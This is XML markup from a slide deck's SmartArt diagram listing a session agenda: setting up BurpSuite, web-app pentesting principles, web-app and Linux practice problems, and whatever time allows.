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0" autoAdjust="0"/>
    <p:restoredTop sz="74118" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82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22352-E892-4964-8490-D3B750669E82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BDCE6E-8AF3-4A87-8DB7-526AF3FC4278}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Installing and configuring BurpSuite</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C97FE232-6E81-4A93-987A-4165AC8F82CB}" type="parTrans" cxnId="{8E9CCB7D-2819-48C4-883A-03FC984368D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01A0B928-E85D-422F-800F-2DC542C35C6E}" type="sibTrans" cxnId="{8E9CCB7D-2819-48C4-883A-03FC984368D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Overview of important webapp pentesting principles</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DF7518A-4111-4420-8C96-8C2CFFAE3198}" type="parTrans" cxnId="{7D00DD5B-8805-4942-BA88-BC3E7E968150}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E11F896-DEC7-4526-9A33-427E504EAE05}" type="sibTrans" cxnId="{7D00DD5B-8805-4942-BA88-BC3E7E968150}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Continue working on webapp problems</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E771B5D7-614C-40A9-AD70-12C171E90055}" type="parTrans" cxnId="{E8E7E64A-7CEB-4188-836B-0EED53EC7727}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F10B11E-8863-408C-9AFF-685DEECA6304}" type="sibTrans" cxnId="{E8E7E64A-7CEB-4188-836B-0EED53EC7727}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Start working on linux based problems</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80937FDE-2470-44BF-82D5-0F3060393D37}" type="parTrans" cxnId="{188CE463-C01B-416A-B437-398BFFFE24D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD4D5995-C328-410A-8BFA-C99DC0FE22A1}" type="sibTrans" cxnId="{188CE463-C01B-416A-B437-398BFFFE24D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Whatever we have time for!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BCF9D5C-8098-428E-BDC8-34BCBC633118}" type="parTrans" cxnId="{28682CD5-5835-4F54-B0F1-E6D402242437}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBA5AAD7-2F93-4985-9D3B-0B863CCC2DF2}" type="sibTrans" cxnId="{28682CD5-5835-4F54-B0F1-E6D402242437}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{543F63DE-CF5F-43CC-A50B-90CA44CBACC5}" type="pres">
      <dgm:prSet presAssocID="{E9D22352-E892-4964-8490-D3B750669E82}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" type="pres">
      <dgm:prSet presAssocID="{E9D22352-E892-4964-8490-D3B750669E82}" presName="container" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" type="pres">
      <dgm:prSet presAssocID="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{347D6051-37F4-4A6D-B14E-D36F82DB530A}" type="pres">
      <dgm:prSet presAssocID="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5246CFD5-B1E2-4B4B-AEB8-CF1B8F3A916A}" type="pres">
      <dgm:prSet presAssocID="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC42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13008934-A8D5-47F6-8E81-38D1AB0277CE}" type="pres">
      <dgm:prSet presAssocID="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A400509-63C9-4E06-A324-7C76995D049F}" type="pres">
      <dgm:prSet presAssocID="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2D459959-2D82-4900-982F-AB00A2C665EB}" type="pres">
      <dgm:prSet presAssocID="{01A0B928-E85D-422F-800F-2DC542C35C6E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" type="pres">
      <dgm:prSet presAssocID="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6260BFF0-3499-45AE-8417-C9652615FE6D}" type="pres">
      <dgm:prSet presAssocID="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16F18F30-1861-4BFC-A770-61F9ED75B37A}" type="pres">
      <dgm:prSet presAssocID="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D573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8A01533-ABF1-4F5A-8B03-395A1BF56E54}" type="pres">
      <dgm:prSet presAssocID="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E964C0E1-3363-4F1D-91EF-CADAB5304059}" type="pres">
      <dgm:prSet presAssocID="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{57151762-6AC5-4A02-B485-3CAFD3CC5D47}" type="pres">
      <dgm:prSet presAssocID="{0E11F896-DEC7-4526-9A33-427E504EAE05}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" type="pres">
      <dgm:prSet presAssocID="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30B91549-EF96-4289-B190-2899E639E635}" type="pres">
      <dgm:prSet presAssocID="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F14C9CF-1FE1-489B-8E97-44A2215BCD2C}" type="pres">
      <dgm:prSet presAssocID="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109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02173838-A996-450D-98D5-8A80F5DC5210}" type="pres">
      <dgm:prSet presAssocID="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6581F3AB-5D14-433B-9ACB-5F7DD3ADDE56}" type="pres">
      <dgm:prSet presAssocID="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6670D725-7FD5-44B1-A2BB-D7FC17F683D6}" type="pres">
      <dgm:prSet presAssocID="{0F10B11E-8863-408C-9AFF-685DEECA6304}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" type="pres">
      <dgm:prSet presAssocID="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61952209-C338-44C9-BBE4-58A8A9F5FA00}" type="pres">
      <dgm:prSet presAssocID="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{497477BD-16AB-4BE7-ACAE-9463265E797D}" type="pres">
      <dgm:prSet presAssocID="{AD0FA5B1-036C-40B7-B72A-A710F2677A5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AA4B6A6-2F91-46B4-BDF6-3C3F7E9412EB}" type="pres">
      <dgm:prSet presAssocID="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47A8D0B9-5B56-4E44-8BB6-A39C5B0D473D}" type="pres">
      <dgm:prSet presAssocID="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C73158E-0206-45F4-A88F-85571DD61018}" type="pres">
      <dgm:prSet presAssocID="{BD4D5995-C328-410A-8BFA-C99DC0FE22A1}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" type="pres">
      <dgm:prSet presAssocID="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40D60D5F-96EF-4981-8596-9FC516CE727B}" type="pres">
      <dgm:prSet presAssocID="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15DBFB9B-4A2C-4EC3-B624-ACD4A1325DF2}" type="pres">
      <dgm:prSet presAssocID="{FF0E251E-B1F0-441E-94A9-769651BB3E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40BFCFB-AB6D-4BCD-B320-B165903D74C0}" type="pres">
      <dgm:prSet presAssocID="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D20129EF-F297-4BCB-B7D2-E05346BCBAC1}" type="pres">
      <dgm:prSet presAssocID="{FF0E251E-B1F0-441E-94A9-769651BB3EB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DEFC601-B7E9-4ABE-A8C0-90DE1B5CEF4F}" type="presOf" srcId="{BD4D5995-C328-410A-8BFA-C99DC0FE22A1}" destId="{8C73158E-0206-45F4-A88F-85571DD61018}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{D31F5704-02AC-4A4F-BCF3-37C6D6B5C1EE}" type="presOf" srcId="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" destId="{E964C0E1-3363-4F1D-91EF-CADAB5304059}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{4B5B213E-8BE2-4D7A-BD18-D00C8B5B6EA3}" type="presOf" srcId="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" destId="{47A8D0B9-5B56-4E44-8BB6-A39C5B0D473D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{82A36344-3A17-41A9-8197-BFA6550A35E0}" type="presOf" srcId="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}" destId="{D20129EF-F297-4BCB-B7D2-E05346BCBAC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{E8E7E64A-7CEB-4188-836B-0EED53EC7727}" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" srcOrd="2" destOrd="0" parTransId="{E771B5D7-614C-40A9-AD70-12C171E90055}" sibTransId="{0F10B11E-8863-408C-9AFF-685DEECA6304}"/>
    <dgm:cxn modelId="{CFBD9A51-FC3B-4ED3-B448-CE5C88EAF812}" type="presOf" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{543F63DE-CF5F-43CC-A50B-90CA44CBACC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{8980CC51-30D5-42C1-B734-EA13FD945A94}" type="presOf" srcId="{0E11F896-DEC7-4526-9A33-427E504EAE05}" destId="{57151762-6AC5-4A02-B485-3CAFD3CC5D47}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{7D00DD5B-8805-4942-BA88-BC3E7E968150}" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{3DFAEA0D-B9BC-41F3-ACD7-0F6A43D57340}" srcOrd="1" destOrd="0" parTransId="{3DF7518A-4111-4420-8C96-8C2CFFAE3198}" sibTransId="{0E11F896-DEC7-4526-9A33-427E504EAE05}"/>
    <dgm:cxn modelId="{2A284D5D-DD00-4A3E-A82E-A0B0BFEFA1FC}" type="presOf" srcId="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" destId="{6A400509-63C9-4E06-A324-7C76995D049F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{188CE463-C01B-416A-B437-398BFFFE24D1}" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{AD0FA5B1-036C-40B7-B72A-A710F2677A58}" srcOrd="3" destOrd="0" parTransId="{80937FDE-2470-44BF-82D5-0F3060393D37}" sibTransId="{BD4D5995-C328-410A-8BFA-C99DC0FE22A1}"/>
    <dgm:cxn modelId="{8E9CCB7D-2819-48C4-883A-03FC984368D1}" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{DFBDCE6E-8AF3-4A87-8DB7-526AF3FC4278}" srcOrd="0" destOrd="0" parTransId="{C97FE232-6E81-4A93-987A-4165AC8F82CB}" sibTransId="{01A0B928-E85D-422F-800F-2DC542C35C6E}"/>
    <dgm:cxn modelId="{CD26A4D3-5BE6-42E1-906E-7E72816BD132}" type="presOf" srcId="{1C28AE19-D9FD-4CF7-A87B-7B3D2C8109E4}" destId="{6581F3AB-5D14-433B-9ACB-5F7DD3ADDE56}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{28682CD5-5835-4F54-B0F1-E6D402242437}" srcId="{E9D22352-E892-4964-8490-D3B750669E82}" destId="{FF0E251E-B1F0-441E-94A9-769651BB3EB1}" srcOrd="4" destOrd="0" parTransId="{9BCF9D5C-8098-428E-BDC8-34BCBC633118}" sibTransId="{CBA5AAD7-2F93-4985-9D3B-0B863CCC2DF2}"/>
    <dgm:cxn modelId="{B43581D5-3B1B-42CA-96B5-D031296C7795}" type="presOf" srcId="{01A0B928-E85D-422F-800F-2DC542C35C6E}" destId="{2D459959-2D82-4900-982F-AB00A2C665EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{96EBD0F3-4F4B-4028-8E0B-B3110E835161}" type="presOf" srcId="{0F10B11E-8863-408C-9AFF-685DEECA6304}" destId="{6670D725-7FD5-44B1-A2BB-D7FC17F683D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{0084CE37-6108-4AFC-BCEC-5F4EBC47222A}" type="presParOf" srcId="{543F63DE-CF5F-43CC-A50B-90CA44CBACC5}" destId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{535DAD34-23F7-4EE8-A924-5196ABE92B47}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{F0A01076-2739-4DB5-B736-2B41A9039735}" type="presParOf" srcId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" destId="{347D6051-37F4-4A6D-B14E-D36F82DB530A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3EE4A019-1056-4FF8-A470-2F5C0FA9BB7A}" type="presParOf" srcId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" destId="{5246CFD5-B1E2-4B4B-AEB8-CF1B8F3A916A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{42E157FB-502B-4221-BB35-23ED686C8EDE}" type="presParOf" srcId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" destId="{13008934-A8D5-47F6-8E81-38D1AB0277CE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{E78A7F2E-7DA1-4A2C-84E8-3FEB0F3C1E60}" type="presParOf" srcId="{33300146-3395-4BFF-8DED-4CB3A84187BC}" destId="{6A400509-63C9-4E06-A324-7C76995D049F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{02D574B3-0C8A-470D-8237-99781C907E7A}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{2D459959-2D82-4900-982F-AB00A2C665EB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{22AE62D2-9B16-4F6A-9A85-77655484AC9F}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{5704575C-8D82-4CD0-9852-5C29441E4340}" type="presParOf" srcId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" destId="{6260BFF0-3499-45AE-8417-C9652615FE6D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{9BEAB7DB-C654-4627-A3A8-C96623EA7E58}" type="presParOf" srcId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" destId="{16F18F30-1861-4BFC-A770-61F9ED75B37A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{CD2D2CF3-DCA4-4E14-BFBC-F82AAF2A22E1}" type="presParOf" srcId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" destId="{68A01533-ABF1-4F5A-8B03-395A1BF56E54}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{6A796DD1-824B-4C16-9ABB-7AB673FF1EFE}" type="presParOf" srcId="{7FD0727E-9778-4A7B-BDBB-20D5786E8126}" destId="{E964C0E1-3363-4F1D-91EF-CADAB5304059}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{D141E898-D726-45D2-B765-2B8F295E2A4B}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{57151762-6AC5-4A02-B485-3CAFD3CC5D47}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{C48E08CF-5F0B-4BE2-8BD6-243710E9116F}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{539DE9E3-8E02-4ED7-A927-BFC8E742C8B0}" type="presParOf" srcId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" destId="{30B91549-EF96-4289-B190-2899E639E635}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{1EB3D7C8-B66D-4AC1-9FEF-5324A64E559F}" type="presParOf" srcId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" destId="{1F14C9CF-1FE1-489B-8E97-44A2215BCD2C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{CE979933-ED4F-4A5A-AFA7-0E89D559D0BE}" type="presParOf" srcId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" destId="{02173838-A996-450D-98D5-8A80F5DC5210}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{DAE98FCD-8251-468D-AF7D-57C607EE1148}" type="presParOf" srcId="{A58FB454-8579-491D-A994-A1D0ABAC97CD}" destId="{6581F3AB-5D14-433B-9ACB-5F7DD3ADDE56}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{BBA1FCF8-A0CF-479E-ADAF-0829D5945206}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{6670D725-7FD5-44B1-A2BB-D7FC17F683D6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{725B6B82-0ADB-4E88-BA8E-93B56CD58404}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{910107FA-A44E-4405-AA9B-E658CD76C340}" type="presParOf" srcId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" destId="{61952209-C338-44C9-BBE4-58A8A9F5FA00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{FE655A35-EEDF-43BA-ABE1-F1B3E1060C44}" type="presParOf" srcId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" destId="{497477BD-16AB-4BE7-ACAE-9463265E797D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{7B935ACA-BED8-40A3-9772-60BE31365205}" type="presParOf" srcId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" destId="{BAA4B6A6-2F91-46B4-BDF6-3C3F7E9412EB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{69E6BAF3-5049-4AE6-A10F-F494E8E2D75F}" type="presParOf" srcId="{2704B863-F6B1-49C9-9679-5F180B0D4A1B}" destId="{47A8D0B9-5B56-4E44-8BB6-A39C5B0D473D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{0E1598D3-759D-4A01-9FCA-CDEFF1E44805}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{8C73158E-0206-45F4-A88F-85571DD61018}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{655585ED-0A7B-4941-BDCF-A8EFB04C520C}" type="presParOf" srcId="{99BD44EB-381C-406F-81AD-EF5313D6392B}" destId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{F35B7543-2425-4433-AF85-C40549F12573}" type="presParOf" srcId="{6FC03271-BE89-4F81-9462-2B7E44B72E31}" destId="{40D60D5F-96EF-4981-8596-9FC516CE727B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
